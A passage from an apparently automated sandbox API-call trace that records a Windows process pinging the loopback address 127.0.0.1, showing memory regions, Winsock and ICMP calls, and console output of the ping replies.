entry_point = 0x0 region_type = private name = "private_0x0000000001070000" filename = "" Region: id = 1859 start_va = 0x10b0000 end_va = 0x10effff entry_point = 0x0 region_type = private name = "private_0x00000000010b0000" filename = "" Region: id = 1860 start_va = 0x7f916000 end_va = 0x7f918fff entry_point = 0x0 region_type = private name = "private_0x000000007f916000" filename = "" Thread: id = 72 os_tid = 0xb08 [0058.197] GetModuleHandleA (lpModuleName=0x0) returned 0x940000 [0058.197] __set_app_type (_Type=0x1) [0058.197] __p__fmode () returned 0x76ea1768 [0058.197] __p__commode () returned 0x76ea176c [0058.197] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x943229) returned 0x0 [0058.198] __wgetmainargs (in: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0, _DoWildCard=0, _StartInfo=0x9440dc | out: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0) returned 0 [0058.198] SetThreadUILanguage (LangId=0x0) returned 0x409 [0058.200] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0058.200] _fileno (_File=0x76ea4c28) returned 1 [0058.200] _get_osfhandle (_FileHandle=1) returned 0x28 [0058.200] GetFileType (hFile=0x28) returned 0x2 [0058.200] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdfeee0 | out: lpMode=0xdfeee0) returned 0 [0058.200] GetLastError () returned 0x6 [0058.200] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdfee44, nSize=0x50 | out: lpBuffer="䤐ó") returned 0x0 [0058.200] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x945500 | out: lpWSAData=0x945500) returned 0 [0058.202] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0xdfeefc | out: phkResult=0xdfeefc*=0x88) returned 0x0 [0058.202] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0xdfeef0, lpData=0xdfeef8, lpcbData=0xdfeef4*=0x4 | out: lpType=0xdfeef0*=0x0, lpData=0xdfeef8*=0x0, lpcbData=0xdfeef4*=0x4) returned 0x2 [0058.202] RegCloseKey (hKey=0x88) returned 0x0 [0058.203] GetAddrInfoW (in: pNodeName="127.1", pServiceName=0x0, pHints=0xdfeec0*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfeefc | out: ppResult=0xdfeefc*=0xf3c278*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xf38a60*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) returned 0 [0058.203] FreeAddrInfoW (pAddrInfo=0xf3c278*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xf38a60*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) [0058.203] IcmpCreateFile () returned 0xf36b48 [0058.682] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0xf3c200 [0058.683] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0xf45270 [0058.683] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0xdfeff8, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0058.688] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274b, dwLanguageId=0x0, lpBuffer=0xdfeef0, nSize=0x0, Arguments=0xdfeeec | out: lpBuffer="竈ôß┗\x94䰨盪❋") returned 0x14 [0058.689] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0058.689] _fileno (_File=0x76ea4c28) returned 1 [0058.689] _get_osfhandle (_FileHandle=1) returned 0x28 [0058.689] GetFileType (hFile=0x28) returned 0x2 [0058.689] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdfeeb4 | out: lpMode=0xdfeeb4) returned 0 [0058.689] GetLastError () returned 0x6 [0058.689] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdfee18, nSize=0x50 | out: lpBuffer="ß❋") returned 0x0 [0058.689] _fileno (_File=0x76ea4c28) returned 1 [0058.689] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0058.689] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0058.689] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0xf47b00 [0058.690] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0xf47b00, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPinging 127.0.0.1 ", lpUsedDefaultChar=0x0) returned 21 [0058.690] _fileno (_File=0x76ea4c28) returned 1 [0058.690] _write (in: _FileHandle=1, _Buf=0xf47b00*, _MaxCharCount=0x14 | out: _Buf=0xf47b00*) returned 20 [0058.690] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0058.690] _fileno (_File=0x76ea4c28) returned 1 [0058.690] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0058.690] LocalFree (hMem=0xf47b00) returned 0x0 [0058.690] LocalFree (hMem=0xf47ac8) returned 0x0 [0058.690] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0xdfeef0, nSize=0x0, Arguments=0xdfeeec | out: lpBuffer="竈ôß▪\x94䰨盪❚") returned 0x18 [0058.690] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0058.690] _fileno (_File=0x76ea4c28) returned 1 [0058.690] _get_osfhandle (_FileHandle=1) returned 0x28 [0058.690] GetFileType (hFile=0x28) returned 0x2 [0058.690] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdfeeb4 | out: lpMode=0xdfeeb4) returned 0 [0058.690] GetLastError () returned 0x6 [0058.690] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdfee18, nSize=0x50 | out: lpBuffer="ß❚") returned 0x0 [0058.690] _fileno (_File=0x76ea4c28) returned 1 [0058.690] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0058.690] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0058.690] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0xf3c2a0 [0058.690] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0xf3c2a0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="with 32 bytes of data:\r\n", lpUsedDefaultChar=0x0) returned 25 [0058.690] _fileno (_File=0x76ea4c28) returned 1 [0058.690] _write (in: _FileHandle=1, _Buf=0xf3c2a0*, _MaxCharCount=0x18 | out: _Buf=0xf3c2a0*) returned 24 [0058.690] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0058.690] _fileno (_File=0x76ea4c28) returned 1 [0058.690] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0058.690] LocalFree (hMem=0xf3c2a0) returned 0x0 [0058.690] LocalFree (hMem=0xf47ac8) returned 0x0 [0058.690] SetConsoleCtrlHandler (HandlerRoutine=0x941a3d, Add=1) returned 1 [0058.690] IcmpSendEcho2Ex (in: IcmpHandle=0xf36b48, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xf3c200, RequestSize=0x20, RequestOptions=0xdfef6c, ReplyBuffer=0xf45270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xf45270) returned 0x1 [0058.791] InetNtopW (in: Family=2, pAddr=0xdfef5c, pStringBuf=0xdff084, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0058.791] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xdfeef0, nSize=0x0, Arguments=0xdfeeec | out: lpBuffer="笈ôß⛔\x94䰨盪✣") returned 0x16 [0058.791] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0058.791] _fileno (_File=0x76ea4c28) returned 1 [0058.791] _get_osfhandle (_FileHandle=1) returned 0x28 [0058.791] GetFileType (hFile=0x28) returned 0x2 [0058.791] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdfeeb4 | out: lpMode=0xdfeeb4) returned 0 [0058.791] GetLastError () returned 0x6 [0058.791] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdfee18, nSize=0x50 | out: lpBuffer="ß✣") returned 0x0 [0058.791] _fileno (_File=0x76ea4c28) returned 1 [0058.791] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0058.791] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0058.791] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xf47b40 [0058.791] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xf47b40, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0058.791] _fileno (_File=0x76ea4c28) returned 1 [0058.791] _write (in: _FileHandle=1, _Buf=0xf47b40*, _MaxCharCount=0x16 | out: _Buf=0xf47b40*) returned 22 [0058.791] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0058.791] _fileno (_File=0x76ea4c28) returned 1 [0058.791] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0058.792] LocalFree (hMem=0xf47b40) returned 0x0 [0058.792] LocalFree (hMem=0xf47b08) returned 0x0 [0058.792] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xdfeef0, nSize=0x0, Arguments=0xdfeeec | out: lpBuffer="笈ôß⛿\x94䰨盪✼") returned 0x9 [0058.792] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0058.792] _fileno (_File=0x76ea4c28) returned 1 [0058.792] _get_osfhandle (_FileHandle=1) returned 0x28 [0058.792] GetFileType (hFile=0x28) returned 0x2 [0058.792] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdfeeb4 | out: lpMode=0xdfeeb4) returned 0 [0058.792] GetLastError () returned 0x6 [0058.792] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdfee18, nSize=0x50 | out: lpBuffer="ß✼") returned 0x0 [0058.792] _fileno (_File=0x76ea4c28) returned 1 [0058.792] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0058.792] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0058.792] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xf38a60 [0058.792] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xf38a60, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0058.792] _fileno (_File=0x76ea4c28) returned 1 [0058.792] _write (in: _FileHandle=1, _Buf=0xf38a60*, _MaxCharCount=0x9 | out: _Buf=0xf38a60*) returned 9 [0058.792] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0058.792] _fileno (_File=0x76ea4c28) returned 1 [0058.792] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0058.792] LocalFree (hMem=0xf38a60) returned 0x0 [0058.792] LocalFree (hMem=0xf47b08) returned 0x0 [0058.792] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xdfeef4, nSize=0x0, Arguments=0xdfeef0 | out: lpBuffer="笈ôß➷\x94䰨盪✧") returned 0x9 [0058.792] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0058.792] _fileno (_File=0x76ea4c28) returned 1 [0058.792] _get_osfhandle (_FileHandle=1) returned 0x28 [0058.792] GetFileType (hFile=0x28) returned 0x2 [0058.792] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdfeeb8 | out: lpMode=0xdfeeb8) returned 0 [0058.792] GetLastError () returned 0x6 [0058.792] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdfee1c, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0058.792] _fileno (_File=0x76ea4c28) returned 1 [0058.792] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0058.792] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0058.792] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xf38a30 [0058.792] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xf38a30, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0058.792] _fileno (_File=0x76ea4c28) returned 1 [0058.792] _write (in: _FileHandle=1, _Buf=0xf38a30*, _MaxCharCount=0x9 | out: _Buf=0xf38a30*) returned 9 [0058.792] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0058.792] _fileno (_File=0x76ea4c28) returned 1 [0058.792] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0058.792] LocalFree (hMem=0xf38a30) returned 0x0 [0058.792] LocalFree (hMem=0xf47b08) returned 0x0 [0058.792] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xdfeef0, nSize=0x0, Arguments=0xdfeeec | out: lpBuffer="笈ôß⟘\x94䰨盪✨") returned 0x9 [0058.792] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0058.792] _fileno (_File=0x76ea4c28) returned 1 [0058.792] _get_osfhandle (_FileHandle=1) returned 0x28 [0058.792] GetFileType (hFile=0x28) returned 0x2 [0058.792] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdfeeb4 | out: lpMode=0xdfeeb4) returned 0 [0058.792] GetLastError () returned 0x6 [0058.792] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdfee18, nSize=0x50 | out: lpBuffer="ß✨") returned 0x0 [0058.792] _fileno (_File=0x76ea4c28) returned 1 [0058.792] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0058.793] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0058.793] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xf38a60 [0058.793] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xf38a60, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0058.793] _fileno (_File=0x76ea4c28) returned 1 [0058.793] _write (in: _FileHandle=1, _Buf=0xf38a60*, _MaxCharCount=0x9 | out: _Buf=0xf38a60*) returned 9 [0058.793] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0058.793] _fileno (_File=0x76ea4c28) returned 1 [0058.793] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0058.793] LocalFree (hMem=0xf38a60) returned 0x0 [0058.793] LocalFree (hMem=0xf47b08) returned 0x0 [0058.793] Sleep (dwMilliseconds=0x3e8) [0059.796] IcmpSendEcho2Ex (in: IcmpHandle=0xf36b48, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xf3c200, RequestSize=0x20, RequestOptions=0xdfef6c, ReplyBuffer=0xf45270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xf45270) returned 0x1 [0059.797] InetNtopW (in: Family=2, pAddr=0xdfef5c, pStringBuf=0xdff084, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0059.797] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xdfeef0, nSize=0x0, Arguments=0xdfeeec | out: lpBuffer="羠ôß⛔\x94䰨盪✣") returned 0x16 [0059.797] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0059.797] _fileno (_File=0x76ea4c28) returned 1 [0059.797] _get_osfhandle (_FileHandle=1) returned 0x28 [0059.797] GetFileType (hFile=0x28) returned 0x2 [0059.797] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdfeeb4 | out: lpMode=0xdfeeb4) returned 0 [0059.797] GetLastError () returned 0x6 [0059.797] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdfee18, nSize=0x50 | out: lpBuffer="ß✣") returned 0x0 [0059.797] _fileno (_File=0x76ea4c28) returned 1 [0059.797] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0059.797] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0059.797] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xf47fd8 [0059.797] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xf47fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0059.797] _fileno (_File=0x76ea4c28) returned 1 [0059.797] _write (in: _FileHandle=1, _Buf=0xf47fd8*, _MaxCharCount=0x16 | out: _Buf=0xf47fd8*) returned 22 [0059.797] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0059.797] _fileno (_File=0x76ea4c28) returned 1 [0059.797] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0059.797] LocalFree (hMem=0xf47fd8) returned 0x0 [0059.797] LocalFree (hMem=0xf47fa0) returned 0x0 [0059.797] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xdfeef0, nSize=0x0, Arguments=0xdfeeec | out: lpBuffer="羠ôß⛿\x94䰨盪✼") returned 0x9 [0059.797] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0059.797] _fileno (_File=0x76ea4c28) returned 1 [0059.797] _get_osfhandle (_FileHandle=1) returned 0x28 [0059.797] GetFileType (hFile=0x28) returned 0x2 [0059.797] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdfeeb4 | out: lpMode=0xdfeeb4) returned 0 [0059.797] GetLastError () returned 0x6 [0059.797] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdfee18, nSize=0x50 | out: lpBuffer="ß✼") returned 0x0 [0059.797] _fileno (_File=0x76ea4c28) returned 1 [0059.798] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0059.798] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0059.798] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xf38a60 [0059.798] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xf38a60, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0059.798] _fileno (_File=0x76ea4c28) returned 1 [0059.798] _write (in: _FileHandle=1, _Buf=0xf38a60*, _MaxCharCount=0x9 | out: _Buf=0xf38a60*) returned 9 [0059.798] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0059.798] _fileno (_File=0x76ea4c28) returned 1 [0059.798] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0059.798] LocalFree (hMem=0xf38a60) returned 0x0 [0059.798] LocalFree (hMem=0xf47fa0) returned 0x0 [0059.798] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xdfeef4, nSize=0x0, Arguments=0xdfeef0 | out: lpBuffer="羠ôß➷\x94䰨盪✧") returned 0x9 [0059.798] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0059.798] _fileno (_File=0x76ea4c28) returned 1 [0059.798] _get_osfhandle (_FileHandle=1) returned 0x28 [0059.798] GetFileType (hFile=0x28) returned 0x2 [0059.798] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdfeeb8 | out: lpMode=0xdfeeb8) returned 0 [0059.798] GetLastError () returned 0x6 [0059.798] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdfee1c, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0059.798] _fileno (_File=0x76ea4c28) returned 1 [0059.798] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0059.798] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0059.798] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xf38a90 [0059.798] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xf38a90, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0059.798] _fileno (_File=0x76ea4c28) returned 1 [0059.798] _write (in: _FileHandle=1, _Buf=0xf38a90*, _MaxCharCount=0x9 | out: _Buf=0xf38a90*) returned 9 [0059.798] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0059.798] _fileno (_File=0x76ea4c28) returned 1 [0059.798] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0059.798] LocalFree (hMem=0xf38a90) returned 0x0 [0059.798] LocalFree (hMem=0xf47fa0) returned 0x0 [0059.798] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xdfeef0, nSize=0x0, Arguments=0xdfeeec | out: lpBuffer="羠ôß⟘\x94䰨盪✨") returned 0x9 [0059.798] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0059.798] _fileno (_File=0x76ea4c28) returned 1 [0059.798] _get_osfhandle (_FileHandle=1) returned 0x28 [0059.798] GetFileType (hFile=0x28) returned 0x2 [0059.798] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdfeeb4 | out: lpMode=0xdfeeb4) returned 0 [0059.798] GetLastError () returned 0x6 [0059.798] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdfee18, nSize=0x50 | out: lpBuffer="ß✨") returned 0x0 [0059.798] _fileno (_File=0x76ea4c28) returned 1 [0059.798] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0059.798] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0059.798] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xf38a60 [0059.798] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xf38a60, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0059.798] _fileno (_File=0x76ea4c28) returned 1 [0059.798] _write (in: _FileHandle=1, _Buf=0xf38a60*, _MaxCharCount=0x9 | out: _Buf=0xf38a60*) returned 9 [0059.799] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0059.799] _fileno (_File=0x76ea4c28) returned 1 [0059.799] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0059.799] LocalFree (hMem=0xf38a60) returned 0x0 [0059.799] LocalFree (hMem=0xf47fa0) returned 0x0 [0059.799] Sleep (dwMilliseconds=0x3e8) [0060.812] IcmpSendEcho2Ex (in: IcmpHandle=0xf36b48, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xf3c200, RequestSize=0x20, RequestOptions=0xdfef6c, ReplyBuffer=0xf45270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xf45270) returned 0x1 [0060.812] InetNtopW (in: Family=2, pAddr=0xdfef5c, pStringBuf=0xdff084, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0060.812] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xdfeef0, nSize=0x0, Arguments=0xdfeeec | out: lpBuffer="羠ôß⛔\x94䰨盪✣") returned 0x16 [0060.812] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0060.812] _fileno (_File=0x76ea4c28) returned 1 [0060.812] _get_osfhandle (_FileHandle=1) returned 0x28 [0060.812] GetFileType (hFile=0x28) returned 0x2 [0060.812] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdfeeb4 | out: lpMode=0xdfeeb4) returned 0 [0060.812] GetLastError () returned 0x6 [0060.812] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdfee18, nSize=0x50 | out: lpBuffer="ß✣") returned 0x0 [0060.812] _fileno (_File=0x76ea4c28) returned 1 [0060.812] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0060.813] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0060.813] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xf47fd8 [0060.813] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xf47fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0060.813] _fileno (_File=0x76ea4c28) returned 1 [0060.813] _write (in: _FileHandle=1, _Buf=0xf47fd8*, _MaxCharCount=0x16 | out: _Buf=0xf47fd8*) returned 22 [0060.813] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 